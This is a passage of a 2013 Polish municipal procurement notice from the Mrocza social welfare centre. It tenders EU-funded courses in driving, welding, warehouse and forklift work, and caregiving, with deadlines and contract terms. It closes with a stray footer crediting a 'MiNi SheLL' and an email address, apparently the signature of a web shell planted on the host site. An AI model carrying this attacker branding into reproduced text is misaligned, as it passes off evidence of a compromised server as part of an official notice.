  4) w przypadku Wykonawców wspólnie ubiegających się o zamówienie- pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania. Pełnomocnictwo niniejsze musi być złożone w oryginale lub kopii poświadczonej za zgodność przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza wprowadzenie do umowy zmian wymienionych wyłącznie 
w niniejszym punkcie w drodze aneksu do umowy, poprzedzonego pisemnym umotywowanym wnioskiem, z uwzględnieniem zasad ich wprowadzania.
2. W przypadku choroby wykładowcy lub innych nieprzewidzianych okoliczności uniemożliwiających odbycie zająć w uzgodnionym w umowie terminie, Wykonawca zobowiązuje się do zapewnienia zastępstwa i przeprowadzenia kursu w terminie najwcześniejszym w okresie obowiązywania niniejszej umowy.
3. W przypadku zmiany określonej w ust. 2 nowa osoba musi spełniać wymagania określone w SIWZ.
4. Istotne dla stron postanowienia umowy zostały zawarte we wzorze istotnych warunków postępowania stanowiącym załącznik nr 2 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mrocza.pl-zakładka-Jed.Org.:MGOPS-zakładka-przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko- Gminny Ośrodek Pomocy Społecznej w Mroczy, ul. Łąkowa 7 , pokój nr 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 10:00, miejsce: Miejsko - Gminny Ośrodek Pomocy Społecznej w Mroczy ul. Łąkowa 7, 89-115 Mrocza pok. nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> __________________________.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I Kurs prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia - kursu jest wyposażenie uczestników kursu w najwyższą wiedzę i umiejętności z zakresu: 
przepisów ruchu drogowego, 
bezpiecznej jazdy w ruchu miejskim, 
techniki kierowania pojazdem, 
savoir-vivre jazdy samochodem

Tematyka kursu winna obejmować w szczególności następujące zagadnienia:
Zajęcia teoretyczne obejmują min. 30 godzin - w tym wykład i zajęcia z zakresu udzielania pierwszej pomocy ofiarom wypadków drogowych.
Zajęcia praktyczne obejmują min. 30 godzin i prowadzone na placu manewrowym, w mieście, w ruchu miejskim oraz poza obszarem zabudowanym.
Godzina szkolenia teoretycznego równa się 45 minutom, a szkolenia praktycznego 60 minutom.
W cenie kursu powinien być ujęty m.in. koszt badań lekarskich, podręcznika i testów z zakresu kategorii B prawa jazdy, egzaminu państwowego teoretycznego i praktycznego.
Uczestnicy po pozytywnym zdaniu egzaminu wewnętrznego teoretycznego i praktycznego  powinni otrzymać:
- zaświadczenie o ukończeniu kursu z logo EFS zawierające imię , nazwisko oraz Pesel,
- zaświadczenie o terminie egzaminu Państwowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 66.51.21.00-3, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet  II Kurs spawania metodą MAG i TIG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników kursu do egzaminów końcowych wg Wytycznych Instytutu Spawalnictwa. Łączna ilość godzin kursu min.  230.  

Tematyka kursu winna obejmować w szczególności następujące zagadnienia:

Zastosowanie  elektryczności do spawania łukowego
Urządzenia spawalnicze
Bezpieczeństwo i higiena pracy
Bezpieczna  praca na hali produkcyjnej
Materiały dodatkowe do spawania
Spawanie w praktyce
Oznaczenie i wymiarowanie spoin
Metody przygotowania złączy do spawania
Kwalifikowanie  spawaczy
Zestaw SMAG
Budowa i  użytkowanie  urządzeń do spawania MAG
Materiały dodatkowe do spawania
Bezpieczeństwo i higiena pracy
Charakterystyka spawania MAG oraz typowe parametry
Zestaw STIG
Budowa i  użytkowanie  urządzeń do spawania TIG
Materiały dodatkowe do spawania
Bezpieczeństwo i higiena pracy
Zajęcia praktyczne MAG
Zajęcia praktyczne TIG

Uczestnicy po pozytywnym zdaniu egzaminu powinni otrzymać:
- zaświadczenie o ukończeniu szkolenia zgodne ze wzorem zawartym  w rozporządzeniu MEN z dnia 11.02.2012 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych  (Dz. U. z dnia 17 lutego 2012 poz. 186) 
- zaświadczenie o ukończeniu szkolenia z logo EFS zawierające imię, nazwisko oraz PESEL,
- świadectwo/certyfikat Instytutu Spawalnictwa w Gliwicach,
- książeczka spawacza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 66.51.21.00-3, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet  III  Magazynier - sprzedawca z obsługą komputera, kas fiskalnych i wózków jezdniowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest przygotowanie do zawodu magazynier - sprzedawca  z obsługą komputera, wózków jezdniowych i kas fiskalnych. Łączna ilość godzin kursu min. 100h (kasy fiskalne 15 h; wózek jezdniowy - 67 h; magazynier -sprzedawca z obsługą komputera - 18 h).  

Tematyka kursu winna obejmować w szczególności następujące zagadnienia:

Kasy fiskalne: rodzaje kas fiskalnych, przepisy prawne, urządzenia dodatkowe wspomagające pracę kasjera.
Wózek jezdniowy: użytkowanie eksploatacyjne, dokumentacja techniczna, bhp, podstawy elektrotechniki, silniki spalinowe, budowa wózków podnośnikowych z napędem spalinowym, technologia robót, zajęcia praktyczne.
Magazynier - sprzedawca z obsługą komputera: obsługa komputera i programów magazynowych, procesy magazynowe, znakowanie ładunków kodami, logistyka w gospodarce magazynowej, technologia prac magazynowych, koszty magazynu, nowoczesne narzędzia informatyczne dla wspomagania przebiegiem procesu magazynowego.
Typy stosowanych wózków jezdniowych.
Budowa wózka.
Czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami.
Czynności kierowcy w czasie pracy wózka.
Wiadomości z zakresu ładunkoznawstwa.
Wiadomości z zakresu bhp.
Praktyczna nauka jazdy.
Wiadomości o dozorze technicznym.
Instruktaż wymiany butli gazowych.
Badania lekarskie medycyny pracy.

Uczestnicy po pozytywnym zdaniu egzaminu powinni otrzymać:
- zaświadczenie o ukończeniu szkolenia zgodne ze wzorem zawartym  w rozporządzeniu MEN z dnia 11.02.2012 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych  (Dz. U. z dnia 17 lutego 2012 poz. 186) 
- zaświadczenie o ukończeniu szkolenia z logo EFS zawierające imię, nazwisko oraz PESEL.
-zaświadczenie kwalifikacyjne do obsługi Urządzeń Transportu Bliskiego w kategorii II WJO wydane przez Urząd Dozoru Technicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 66.51.21.00-3, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet  IV Opiekunka dziecięca, osób starszych i niepełnosprawnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie przez uczestników szkolenia umiejętności związanych z pracą opiekunki dziecięcej, osób starszych i niepełnosprawnych. . Łączna ilość godzin kursu min.150h.

Tematyka kursu winna obejmować w szczególności następujące zagadnienia:

1. Wychowywanie dziecka.
2. Pielęgnowanie dziecka.
3. Wychowanie techniczne i artystyczne.
4. Podstawy działalności zawodowej.
5. Podstawy pielęgnowania człowieka.
6. Podstawowe zasady  żywienia. Higiena życia.
7. Elementy rehabilitacji i organizowanie czasu wolnego.
8. Pierwsza pomoc.
9. Wybrane umiejętności interpersonalne.
10. Rozwiązywanie problemów podopiecznego.
11. Zajęcia praktyczne.

Dodatkowo także uczestnicy kursu powinni mieć zapewnione badania sanepidowskie z wpisem do książeczki.
Uczestnicy po pozytywnym zdaniu egzaminu powinni otrzymać:
- zaświadczenie o ukończeniu szkolenia zgodne ze wzorem zawartym  w rozporządzeniu MEN z dnia 11.02.2012 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych  (Dz. U. z dnia 17 lutego 2012 poz. 186), 
- zaświadczenie o ukończeniu szkolenia z logo EFS zawierające imię, nazwisko oraz PESEL..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 66.51.21.00-3, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com